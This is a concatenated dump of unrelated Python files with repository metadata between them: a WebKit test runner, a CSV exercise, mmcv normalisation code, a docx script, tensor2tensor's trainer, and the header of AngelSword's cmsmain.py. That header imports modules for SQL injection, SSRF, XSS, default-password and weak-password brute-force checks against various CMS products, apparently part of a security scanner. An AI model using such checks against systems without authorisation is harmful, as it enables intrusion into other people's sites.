parser.add_option('-j', '--child-processes', action='store', type='int', default=(1 if sys.platform == 'win32' else multiprocessing.cpu_count()),
help='number of tests to run in parallel (default=%default)')
parser.add_option('-p', '--pass-through', action='store_true', default=False,
help='be debugger friendly by passing captured output through to the system')
parser.add_option('-q', '--quiet', action='store_true', default=False,
help='run quietly (errors, warnings, and progress only)')
parser.add_option('-t', '--timing', action='store_true', default=False,
help='display per-test execution time (implies --verbose)')
parser.add_option('-v', '--verbose', action='count', default=0,
help='verbose output (specify once for individual test results, twice for debug messages)')
parser.epilog = ('[args...] is an optional list of modules, test_classes, or individual tests. '
'If no args are given, all the tests will be run.')
return parser.parse_args(argv)
def run(self):
self._options, args = self._parse_args()
# Make sure PYTHONPATH is set up properly.
sys.path = self.finder.additional_paths(sys.path) + sys.path
# FIXME: unittest2 and coverage need to be in sys.path for their internal imports to work.
thirdparty_path = self.webkit_finder.path_from_webkit_base('Tools', 'Scripts', 'webkitpy', 'thirdparty')
if not thirdparty_path in sys.path:
sys.path.append(thirdparty_path)
self.printer.configure(self._options)
self.finder.clean_trees()
names = self.finder.find_names(args, self._options.all)
if not names:
_log.error('No tests to run')
return False
return self._run_tests(names)
def _run_tests(self, names):
if self._options.coverage:
_log.warning("Checking code coverage, so running things serially")
self._options.child_processes = 1
import coverage
cov = coverage.coverage(omit=["/usr/*", "*/webkitpy/thirdparty/*", "/Library/*"])
cov.start()
self.printer.write_update("Checking imports ...")
if not self._check_imports(names):
return False
self.printer.write_update("Finding the individual test methods ...")
loader = _Loader()
parallel_tests, serial_tests = self._test_names(loader, names)
self.printer.write_update("Running the tests ...")
self.printer.num_tests = len(parallel_tests) + len(serial_tests)
start = time.time()
test_runner = Runner(self.printer, loader, self.webkit_finder)
test_runner.run(parallel_tests, self._options.child_processes)
test_runner.run(serial_tests, 1)
self.printer.print_result(time.time() - start)
if self._options.coverage:
cov.stop()
cov.save()
cov.report(show_missing=False)
return not self.printer.num_errors and not self.printer.num_failures
def _check_imports(self, names):
for name in names:
if self.finder.is_module(name):
# if we failed to load a name and it looks like a module,
# try importing it directly, because loadTestsFromName()
# produces lousy error messages for bad modules.
try:
__import__(name)
except ImportError:
_log.fatal('Failed to import %s:' % name)
self._log_exception()
return False
return True
def _test_names(self, loader, names):
parallel_test_method_prefixes = ['test_']
serial_test_method_prefixes = ['serial_test_']
if self._options.integration_tests:
parallel_test_method_prefixes.append('integration_test_')
serial_test_method_prefixes.append('serial_integration_test_')
parallel_tests = []
loader.test_method_prefixes = parallel_test_method_prefixes
for name in names:
parallel_tests.extend(self._all_test_names(loader.loadTestsFromName(name, None)))
serial_tests = []
loader.test_method_prefixes = serial_test_method_prefixes
for name in names:
serial_tests.extend(self._all_test_names(loader.loadTestsFromName(name, None)))
# loader.loadTestsFromName() will not verify that names begin with one of the test_method_prefixes
# if the names were explicitly provided (e.g., MainTest.test_basic), so this means that any individual
# tests will be included in both parallel_tests and serial_tests, and we need to de-dup them.
serial_tests = list(set(serial_tests).difference(set(parallel_tests)))
return (parallel_tests, serial_tests)
def _all_test_names(self, suite):
names = []
if hasattr(suite, '_tests'):
for t in suite._tests:
names.extend(self._all_test_names(t))
else:
names.append(unit_test_name(suite))
return names
def _log_exception(self):
s = StringIO.StringIO()
traceback.print_exc(file=s)
for l in s.buflist:
_log.error(' ' + l.rstrip())
class _Loader(unittest.TestLoader):
test_method_prefixes = []
def getTestCaseNames(self, testCaseClass):
def isTestMethod(attrname, testCaseClass=testCaseClass):
if not hasattr(getattr(testCaseClass, attrname), '__call__'):
return False
return (any(attrname.startswith(prefix) for prefix in self.test_method_prefixes))
testFnNames = filter(isTestMethod, dir(testCaseClass))
testFnNames.sort()
return testFnNames
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
]
| |
56a56c8ead80145924257961f4a0b23562f2d0d9 | 014e4be9addc57eb5599086dc82ba431ed406e81 | /Lesson_2/HW_2/test_file.py | b0e024eeb7ef334a196097e664b346ae69432e64 | []
| no_license | ZakirovRail/back_end | a4f20c099562f901bb107c8e7b333c890cd7995f | 0a03ef5d3283b7a6d22e1848ae8c55c4caef8010 | refs/heads/main | 2023-03-31T00:25:06.568394 | 2021-03-23T07:44:42 | 2021-03-23T07:44:42 | 334,494,409 | 0 | 0 | null | 2021-03-11T12:13:36 | 2021-01-30T19:27:57 | Python | UTF-8 | Python | false | false | 808 | py | import csv
data_to_export = [['Изготовитель системы', 'Название ОС', 'Код продукта', 'Тип системы'], ['LENOVO', 'ACER', 'DELL'], ['Microsoft Windows 7 Профессиональная', 'Microsoft Windows 10 Professional', 'Microsoft Windows 8.1 Professional'], ['00971-OEM-1982661-00231', '00971-OEM-1982661-00231', '00971-OEM-1982661-00231'], ['x64-based PC', 'x64-based PC', 'x86-based PC']]
def write_to_csv(list):
with open('task_1.csv', 'w') as file:
fn_write = csv.writer(file,quoting=csv.QUOTE_NONNUMERIC)
for row in data_to_export:
fn_write.writerow(row)
write_to_csv(data_to_export)
# with open('lesson_csv.csv', 'w') as fn:
# fn_write = csv.writer(fn)
# for row in data:
# fn_write.writerow(row) | [
"[email protected]"
]
| |
e0137a3391a29e3910e09cc2baa1a7f930b2364f | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/contrib/cv/semantic_segmentation/MMseg-swin/mmcv/mmcv/cnn/bricks/norm.py | 565c92213f2cb0b4cc2a5c62d8336442fc7d7472 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later"
]
| permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 8,701 | py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2017
# All rights reserved.
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ==========================================================================
# -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2017
# All rights reserved.
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ==========================================================================
# Copyright (c) OpenMMLab. All rights reserved.
import inspect
from typing import Dict, Tuple, Union
import torch.nn as nn
from mmcv.utils import is_tuple_of
from mmcv.utils.parrots_wrapper import SyncBatchNorm, _BatchNorm, _InstanceNorm
from .registry import NORM_LAYERS
NORM_LAYERS.register_module('BN', module=nn.BatchNorm2d)
NORM_LAYERS.register_module('BN1d', module=nn.BatchNorm1d)
NORM_LAYERS.register_module('BN2d', module=nn.BatchNorm2d)
NORM_LAYERS.register_module('BN3d', module=nn.BatchNorm3d)
NORM_LAYERS.register_module('SyncBN', module=SyncBatchNorm)
NORM_LAYERS.register_module('GN', module=nn.GroupNorm)
NORM_LAYERS.register_module('LN', module=nn.LayerNorm)
NORM_LAYERS.register_module('IN', module=nn.InstanceNorm2d)
NORM_LAYERS.register_module('IN1d', module=nn.InstanceNorm1d)
NORM_LAYERS.register_module('IN2d', module=nn.InstanceNorm2d)
NORM_LAYERS.register_module('IN3d', module=nn.InstanceNorm3d)
def infer_abbr(class_type):
"""Infer abbreviation from the class name.
When we build a norm layer with `build_norm_layer()`, we want to preserve
the norm type in variable names, e.g, self.bn1, self.gn. This method will
infer the abbreviation to map class types to abbreviations.
Rule 1: If the class has the property "_abbr_", return the property.
Rule 2: If the parent class is _BatchNorm, GroupNorm, LayerNorm or
InstanceNorm, the abbreviation of this layer will be "bn", "gn", "ln" and
"in" respectively.
Rule 3: If the class name contains "batch", "group", "layer" or "instance",
the abbreviation of this layer will be "bn", "gn", "ln" and "in"
respectively.
Rule 4: Otherwise, the abbreviation falls back to "norm".
Args:
class_type (type): The norm layer type.
Returns:
str: The inferred abbreviation.
"""
if not inspect.isclass(class_type):
raise TypeError(
f'class_type must be a type, but got {type(class_type)}')
if hasattr(class_type, '_abbr_'):
return class_type._abbr_
if issubclass(class_type, _InstanceNorm): # IN is a subclass of BN
return 'in'
elif issubclass(class_type, _BatchNorm):
return 'bn'
elif issubclass(class_type, nn.GroupNorm):
return 'gn'
elif issubclass(class_type, nn.LayerNorm):
return 'ln'
else:
class_name = class_type.__name__.lower()
if 'batch' in class_name:
return 'bn'
elif 'group' in class_name:
return 'gn'
elif 'layer' in class_name:
return 'ln'
elif 'instance' in class_name:
return 'in'
else:
return 'norm_layer'
def build_norm_layer(cfg: Dict,
num_features: int,
postfix: Union[int, str] = '') -> Tuple[str, nn.Module]:
"""Build normalization layer.
Args:
cfg (dict): The norm layer config, which should contain:
- type (str): Layer type.
- layer args: Args needed to instantiate a norm layer.
- requires_grad (bool, optional): Whether stop gradient updates.
num_features (int): Number of input channels.
postfix (int | str): The postfix to be appended into norm abbreviation
to create named layer.
Returns:
tuple[str, nn.Module]: The first element is the layer name consisting
of abbreviation and postfix, e.g., bn1, gn. The second element is the
created norm layer.
"""
if not isinstance(cfg, dict):
raise TypeError('cfg must be a dict')
if 'type' not in cfg:
raise KeyError('the cfg dict must contain the key "type"')
cfg_ = cfg.copy()
layer_type = cfg_.pop('type')
if layer_type not in NORM_LAYERS:
raise KeyError(f'Unrecognized norm type {layer_type}')
norm_layer = NORM_LAYERS.get(layer_type)
abbr = infer_abbr(norm_layer)
assert isinstance(postfix, (int, str))
name = abbr + str(postfix)
requires_grad = cfg_.pop('requires_grad', True)
cfg_.setdefault('eps', 1e-5)
if layer_type != 'GN':
layer = norm_layer(num_features, **cfg_)
if layer_type == 'SyncBN' and hasattr(layer, '_specify_ddp_gpu_num'):
layer._specify_ddp_gpu_num(1)
else:
assert 'num_groups' in cfg_
layer = norm_layer(num_channels=num_features, **cfg_)
for param in layer.parameters():
param.requires_grad = requires_grad
return name, layer
def is_norm(layer: nn.Module,
exclude: Union[type, tuple, None] = None) -> bool:
"""Check if a layer is a normalization layer.
Args:
layer (nn.Module): The layer to be checked.
exclude (type | tuple[type]): Types to be excluded.
Returns:
bool: Whether the layer is a norm layer.
"""
if exclude is not None:
if not isinstance(exclude, tuple):
exclude = (exclude, )
if not is_tuple_of(exclude, type):
raise TypeError(
f'"exclude" must be either None or type or a tuple of types, '
f'but got {type(exclude)}: {exclude}')
if exclude and isinstance(layer, exclude):
return False
all_norm_bases = (_BatchNorm, _InstanceNorm, nn.GroupNorm, nn.LayerNorm)
return isinstance(layer, all_norm_bases)
| [
"[email protected]"
]
| |
21edcbda377b2af56762d1185106281cd740f5c3 | d8641ab3265371b9926222a80b93e039a96acd36 | /chapter_15/styleChage.py | c65955ed2b01950d7e2e3a0e921769cdf3408258 | []
| no_license | fahimkk/automateTheBoringStuff | af2256f10c8c4ea156e003291a6a309c2ae8dc7d | 6022f2dd4381a378fe360696b6a9f44cd77f873d | refs/heads/master | 2022-12-08T20:52:25.400695 | 2020-09-05T10:43:09 | 2020-09-05T10:43:09 | 284,317,477 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | import docx
import logging
logging.basicConfig(level=logging.DEBUG)
doc = docx.Document('demo.docx')
logging.debug(doc.paragraphs[0].text)
doc.paragraphs[0].style = 'Normal'
doc.paragraphs[1].runs[0].style = 'QuoteChar'
logging.debug(doc.paragraphs[1].runs[0].text)
doc.paragraphs[1].runs[1].underline = True
logging.debug(doc.paragraphs[1].runs[1].text)
doc.paragraphs[1].runs[2].underline = True
logging.debug(doc.paragraphs[1].runs[2].text)
doc.save('restyled.docx')
| [
"[email protected]"
]
| |
746c0dede3c27cd6aa74e780733fb994dc6886e4 | c5759366f8b2cb2e129df0637b62774225a0c41a | /code/tensor2tensor/tensor2tensor/bin/t2t_trainer.py | d25908454f0acaba3ecef93fbc7af21a24a6f56f | [
"Apache-2.0"
]
| permissive | cake-lab/transient-deep-learning | f8646a4386528aa147d8d3dcdff8089985870041 | 87c6717e4026801623cf0327e78ad57f51cb1461 | refs/heads/master | 2022-11-02T20:02:29.642997 | 2022-02-08T16:51:09 | 2022-02-08T16:51:09 | 227,036,173 | 11 | 1 | Apache-2.0 | 2022-10-05T13:01:38 | 2019-12-10T05:27:50 | Python | UTF-8 | Python | false | false | 14,549 | py | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Train and evaluate."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import sys
from tensor2tensor import models # pylint: disable=unused-import
from tensor2tensor import problems as problems_lib # pylint: disable=unused-import
from tensor2tensor.data_generators import problem # pylint: disable=unused-import
from tensor2tensor.utils import cloud_mlengine
from tensor2tensor.utils import decoding
from tensor2tensor.utils import flags as t2t_flags # pylint: disable=unused-import
from tensor2tensor.utils import registry
from tensor2tensor.utils import trainer_lib
from tensor2tensor.utils import usr_dir
import tensorflow as tf
from tensorflow.contrib.tpu.python.tpu import tpu_config
flags = tf.flags
FLAGS = flags.FLAGS
# See flags.py for additional command-line flags.
flags.DEFINE_string("t2t_usr_dir", None,
"Path to a Python module that will be imported. The "
"__init__.py file should include the necessary imports. "
"The imported files should contain registrations, "
"e.g. @registry.register_model calls, that will then be "
"available to the t2t-trainer.")
flags.DEFINE_integer("random_seed", None, "Random seed.")
flags.DEFINE_integer("tpu_num_shards", 8, "Number of tpu shards.")
flags.DEFINE_integer("iterations_per_loop", 100,
"Number of iterations in a TPU training loop.")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU.")
flags.DEFINE_bool("use_tpu_estimator", False, "Whether to use TPUEstimator. "
"This is always enabled when use_tpu is True.")
flags.DEFINE_bool("xla_compile", False, "Whether to use XLA to compile graph.")
flags.DEFINE_integer("tpu_infeed_sleep_secs", None,
"How long to sleep the infeed thread.")
flags.DEFINE_bool("generate_data", False, "Generate data before training?")
flags.DEFINE_string("tmp_dir", "/tmp/t2t_datagen",
"Temporary storage directory, used if --generate_data.")
flags.DEFINE_bool("profile", False, "Profile performance?")
flags.DEFINE_integer("inter_op_parallelism_threads", 0,
"Number of inter_op_parallelism_threads to use for CPU. "
"See TensorFlow config.proto for details.")
flags.DEFINE_integer("intra_op_parallelism_threads", 0,
"Number of intra_op_parallelism_threads to use for CPU. "
"See TensorFlow config.proto for details.")
# TODO(hinsu): Enable DistributionStrategy by default once performance gap
# between DistributionStrategy and Parallelism is resolved.
flags.DEFINE_bool(
"optionally_use_dist_strat", False,
"Whether to use TensorFlow DistributionStrategy instead of explicitly "
"replicating the model. DistributionStrategy is used only if the "
"model replication configuration is supported by the DistributionStrategy.")
# To maintain compatibility with some internal libs, we guard against these flag
# definitions possibly erroring. Apologies for the ugliness.
try:
flags.DEFINE_string("master", "", "Address of TensorFlow master.")
flags.DEFINE_string("output_dir", "", "Base output directory for run.")
flags.DEFINE_string("schedule", "continuous_train_and_eval",
"Method of Experiment to run.")
flags.DEFINE_integer("eval_steps", 100,
"Number of steps in evaluation. By default, eval will "
"stop after eval_steps or when it runs through the eval "
"dataset once in full, whichever comes first, so this "
"can be a very large number.")
except: # pylint: disable=bare-except
pass
flags.DEFINE_string("std_server_protocol", "grpc",
"Protocol for tf.train.Server.")
# Google Cloud TPUs
flags.DEFINE_string("cloud_tpu_name", "%s-tpu" % os.getenv("USER"),
"Name of Cloud TPU instance to use or create.")
# Google Cloud ML Engine
flags.DEFINE_bool("cloud_mlengine", False,
"Whether to launch on Cloud ML Engine.")
flags.DEFINE_string("cloud_mlengine_master_type", None,
"Machine type for master on Cloud ML Engine. "
"If provided, overrides default selections based on "
"--worker_gpu. User is responsible for ensuring "
"type is valid and that --worker_gpu matches number of "
"GPUs on machine type. See documentation: "
"https://cloud.google.com/ml-engine/reference/rest/v1/"
"projects.jobs#traininginput")
# Hyperparameter tuning on Cloud ML Engine
# Pass an --hparams_range to enable
flags.DEFINE_string("autotune_objective", None,
"TensorBoard metric name to optimize.")
flags.DEFINE_bool("autotune_maximize", True,
"Whether to maximize (vs. minimize) autotune_objective.")
flags.DEFINE_integer("autotune_max_trials", 10,
"Maximum number of tuning experiments to run.")
flags.DEFINE_integer("autotune_parallel_trials", 1,
"How many trials to run in parallel (will spin up this "
"many jobs.")
# Note than in open-source TensorFlow, the dash gets converted to an underscore,
# so access is FLAGS.job_dir.
flags.DEFINE_string("job-dir", None,
"DO NOT USE. Exists only for Cloud ML Engine to pass in "
"during hyperparameter tuning. Overrides --output_dir.")
flags.DEFINE_integer("log_step_count_steps", 100,
"Number of local steps after which progress is printed "
"out")
def set_hparams_from_args(args):
"""Set hparams overrides from unparsed args list."""
if not args:
return
hp_prefix = "--hp_"
tf.logging.info("Found unparsed command-line arguments. Checking if any "
"start with %s and interpreting those as hparams "
"settings.", hp_prefix)
pairs = []
i = 0
while i < len(args):
arg = args[i]
if arg.startswith(hp_prefix):
pairs.append((arg[len(hp_prefix):], args[i+1]))
i += 2
else:
tf.logging.warn("Found unknown flag: %s", arg)
i += 1
as_hparams = ",".join(["%s=%s" % (key, val) for key, val in pairs])
if FLAGS.hparams:
as_hparams = "," + as_hparams
FLAGS.hparams += as_hparams
def create_hparams():
if FLAGS.use_tpu and "tpu" not in FLAGS.hparams_set:
tf.logging.warn("Not all hyperparameter sets work on TPU. "
"Prefer hparams_sets with a '_tpu' suffix, "
"e.g. transformer_tpu, if available for your model.")
return trainer_lib.create_hparams(FLAGS.hparams_set, FLAGS.hparams)
def create_experiment_fn():
return trainer_lib.create_experiment_fn(
model_name=FLAGS.model,
problem_name=FLAGS.problem,
data_dir=os.path.expanduser(FLAGS.data_dir),
train_steps=FLAGS.train_steps,
eval_steps=FLAGS.eval_steps,
min_eval_frequency=FLAGS.local_eval_frequency,
schedule=FLAGS.schedule,
eval_throttle_seconds=FLAGS.eval_throttle_seconds,
export=FLAGS.export_saved_model,
decode_hparams=decoding.decode_hparams(FLAGS.decode_hparams),
use_tfdbg=FLAGS.tfdbg,
use_dbgprofile=FLAGS.dbgprofile,
eval_early_stopping_steps=FLAGS.eval_early_stopping_steps,
eval_early_stopping_metric=FLAGS.eval_early_stopping_metric,
eval_early_stopping_metric_delta=FLAGS.eval_early_stopping_metric_delta,
eval_early_stopping_metric_minimize=FLAGS
.eval_early_stopping_metric_minimize,
use_tpu=FLAGS.use_tpu,
use_tpu_estimator=FLAGS.use_tpu_estimator,
use_xla=FLAGS.xla_compile,
warm_start_from=FLAGS.warm_start_from,
decode_from_file=FLAGS.decode_from_file,
decode_to_file=FLAGS.decode_to_file,
decode_reference=FLAGS.decode_reference,
std_server_protocol=FLAGS.std_server_protocol)
def create_run_config(hp, output_dir=None):
"""Create a run config.
Args:
hp: model hyperparameters
output_dir: model's output directory, defaults to output_dir flag.
Returns:
a run config
"""
save_ckpt_steps = max(FLAGS.iterations_per_loop, FLAGS.local_eval_frequency)
save_ckpt_secs = FLAGS.save_checkpoints_secs or None
if save_ckpt_secs:
save_ckpt_steps = None
assert FLAGS.output_dir or FLAGS.checkpoint_path
tpu_config_extra_kwargs = {}
if getattr(hp, "mtf_mode", False):
save_ckpt_steps = None # Disable the default saver
save_ckpt_secs = None # Disable the default saver
tpu_config_extra_kwargs = {
"num_cores_per_replica": 1,
"per_host_input_for_training": tpu_config.InputPipelineConfig.BROADCAST,
}
# the various custom getters we have written do not play well together yet.
# TODO(noam): ask rsepassi for help here.
daisy_chain_variables = (
hp.daisy_chain_variables and
hp.activation_dtype == "float32" and
hp.weight_dtype == "float32")
return trainer_lib.create_run_config(
model_name=FLAGS.model,
model_dir=output_dir or os.path.expanduser(FLAGS.output_dir),
master=FLAGS.master,
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.tpu_num_shards,
log_device_placement=FLAGS.log_device_placement,
save_checkpoints_steps=save_ckpt_steps,
save_checkpoints_secs=save_ckpt_secs,
keep_checkpoint_max=FLAGS.keep_checkpoint_max,
keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours,
num_gpus=FLAGS.worker_gpu,
gpu_order=FLAGS.gpu_order,
shard_to_cpu=FLAGS.locally_shard_to_cpu,
num_async_replicas=FLAGS.worker_replicas,
gpu_mem_fraction=FLAGS.worker_gpu_memory_fraction,
enable_graph_rewriter=FLAGS.enable_graph_rewriter,
use_tpu=FLAGS.use_tpu,
use_tpu_estimator=FLAGS.use_tpu_estimator,
schedule=FLAGS.schedule,
no_data_parallelism=hp.no_data_parallelism,
optionally_use_dist_strat=FLAGS.optionally_use_dist_strat,
daisy_chain_variables=daisy_chain_variables,
ps_replicas=FLAGS.ps_replicas,
ps_job=FLAGS.ps_job,
ps_gpu=FLAGS.ps_gpu,
sync=FLAGS.sync,
worker_id=FLAGS.worker_id,
worker_job=FLAGS.worker_job,
random_seed=FLAGS.random_seed,
tpu_infeed_sleep_secs=FLAGS.tpu_infeed_sleep_secs,
inter_op_parallelism_threads=FLAGS.inter_op_parallelism_threads,
log_step_count_steps=FLAGS.log_step_count_steps,
intra_op_parallelism_threads=FLAGS.intra_op_parallelism_threads,
tpu_config_extra_kwargs=tpu_config_extra_kwargs,
cloud_tpu_name=FLAGS.cloud_tpu_name)
def generate_data():
# Generate data if requested.
data_dir = os.path.expanduser(FLAGS.data_dir)
tmp_dir = os.path.expanduser(FLAGS.tmp_dir)
tf.gfile.MakeDirs(data_dir)
tf.gfile.MakeDirs(tmp_dir)
problem_name = FLAGS.problem
tf.logging.info("Generating data for %s" % problem_name)
registry.problem(problem_name).generate_data(data_dir, tmp_dir)
@contextlib.contextmanager
def profile_context():
if FLAGS.profile:
with tf.contrib.tfprof.ProfileContext(
"/tmp/t2tprof", trace_steps=range(100), dump_steps=range(100)) as pctx:
opts = tf.profiler.ProfileOptionBuilder.time_and_memory()
pctx.add_auto_profiling("op", opts, range(100))
yield
else:
yield
def maybe_log_registry_and_exit():
if FLAGS.registry_help:
tf.logging.info(registry.help_string())
sys.exit(0)
def is_chief():
schedules = ["train", "train_and_evaluate", "continuous_train_and_eval"]
return FLAGS.worker_id == 0 and FLAGS.schedule in schedules
def save_metadata(hparams):
"""Saves FLAGS and hparams to output_dir."""
output_dir = os.path.expanduser(FLAGS.output_dir)
if not tf.gfile.Exists(output_dir):
tf.gfile.MakeDirs(output_dir)
# Save FLAGS in txt file
if hasattr(FLAGS, "flags_into_string"):
flags_str = FLAGS.flags_into_string()
t2t_flags_str = "\n".join([
"--%s=%s" % (f.name, f.value)
for f in FLAGS.flags_by_module_dict()["tensor2tensor.utils.flags"]
])
else:
flags_dict = FLAGS.__dict__["__flags"]
flags_str = "\n".join(
["--%s=%s" % (name, str(f)) for (name, f) in flags_dict.items()])
t2t_flags_str = None
flags_txt = os.path.join(output_dir, "flags.txt")
with tf.gfile.Open(flags_txt, "w") as f:
f.write(flags_str)
if t2t_flags_str:
t2t_flags_txt = os.path.join(output_dir, "flags_t2t.txt")
with tf.gfile.Open(t2t_flags_txt, "w") as f:
f.write(t2t_flags_str)
# Save hparams as hparams.json
hparams_fname = os.path.join(output_dir, "hparams.json")
with tf.gfile.Open(hparams_fname, "w") as f:
f.write(hparams.to_json(indent=0, sort_keys=True))
def execute_schedule(exp):
if not hasattr(exp, FLAGS.schedule):
raise ValueError(
"Experiment has no method %s, from --schedule" % FLAGS.schedule)
with profile_context():
getattr(exp, FLAGS.schedule)()
def run_std_server():
exp = trainer_lib.T2TExperiment(*([None] * 5))
exp.run_std_server()
def main(argv):
tf.logging.set_verbosity(tf.logging.INFO)
if FLAGS.schedule == "run_std_server":
run_std_server()
trainer_lib.set_random_seed(FLAGS.random_seed)
usr_dir.import_usr_dir(FLAGS.t2t_usr_dir)
maybe_log_registry_and_exit()
if FLAGS.cloud_mlengine:
cloud_mlengine.launch()
return
if FLAGS.generate_data:
generate_data()
if cloud_mlengine.job_dir():
FLAGS.output_dir = cloud_mlengine.job_dir()
if argv:
set_hparams_from_args(argv[1:])
hparams = create_hparams()
exp_fn = create_experiment_fn()
exp = exp_fn(create_run_config(hparams), hparams)
if is_chief():
save_metadata(hparams)
execute_schedule(exp)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| [
"[email protected]"
]
| |
961b9ef2cec94e3824919a09b259a06ecf7673bc | f96f64b7c509b79dea692371c2cbd20e1bd246c0 | /cms/cmsmain.py | 1ff75e12ee563d3068a7d5b44635ab26f7b22e4a | []
| no_license | helloexp/AngelSword | 51cbf491e52cb7be601b641a632e65fe3ee82b74 | 4a77ba5f86a2ae422eba4b78856dcf2a6bf9b4c9 | refs/heads/master | 2021-01-21T11:03:16.795459 | 2017-08-24T09:14:37 | 2017-08-24T09:14:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,247 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: cms漏洞库
referer: unknow
author: Lucifer
description: 包含所有cms漏洞类型,封装成一个模块
'''
#autoset vuls
from cms.autoset.autoset_phpmyadmin_unauth import autoset_phpmyadmin_unauth_BaseVerify
#phpstudy vuls
from cms.phpstudy.phpstudy_probe import phpstudy_probe_BaseVerify
from cms.phpstudy.phpstudy_phpmyadmin_defaultpwd import phpstudy_phpmyadmin_defaultpwd_BaseVerify
#Hishop vulns
from cms.Hishop.hishop_productlist_sqli import hishop_productlist_sqli_BaseVerify
#SiteEngine vulns
from cms.siteengine.siteengine_comments_module_sqli import siteengine_comments_module_sqli_BaseVerify
#zfsoft vulns
from cms.zfsoft.zfsoft_service_stryhm_sqli import zfsoft_service_stryhm_sqli_BaseVerify
from cms.zfsoft.zfsoft_database_control import zfsoft_database_control_BaseVerify
from cms.zfsoft.zfsoft_default3_bruteforce import zfsoft_default3_bruteforce_BaseVerify
#ecshop vulns
from cms.ecshop.ecshop_uc_code_sqli import ecshop_uc_code_sqli_BaseVerify
from cms.ecshop.ecshop_flow_orderid_sqli import ecshop_flow_orderid_sqli_BaseVerify
#discuz! vulns
from cms.discuz.discuz_forum_message_ssrf import discuz_forum_message_ssrf_BaseVerify
from cms.discuz.discuz_focus_flashxss import discuz_focus_flashxss_BaseVerify
from cms.discuz.discuz_x25_path_disclosure import discuz_x25_path_disclosure_BaseVerify
from cms.discuz.discuz_plugin_ques_sqli import discuz_plugin_ques_sqli_BaseVerify
#亿邮 vulns
from cms.eyou.eyou_weakpass import eyou_weakpass_BaseVerify
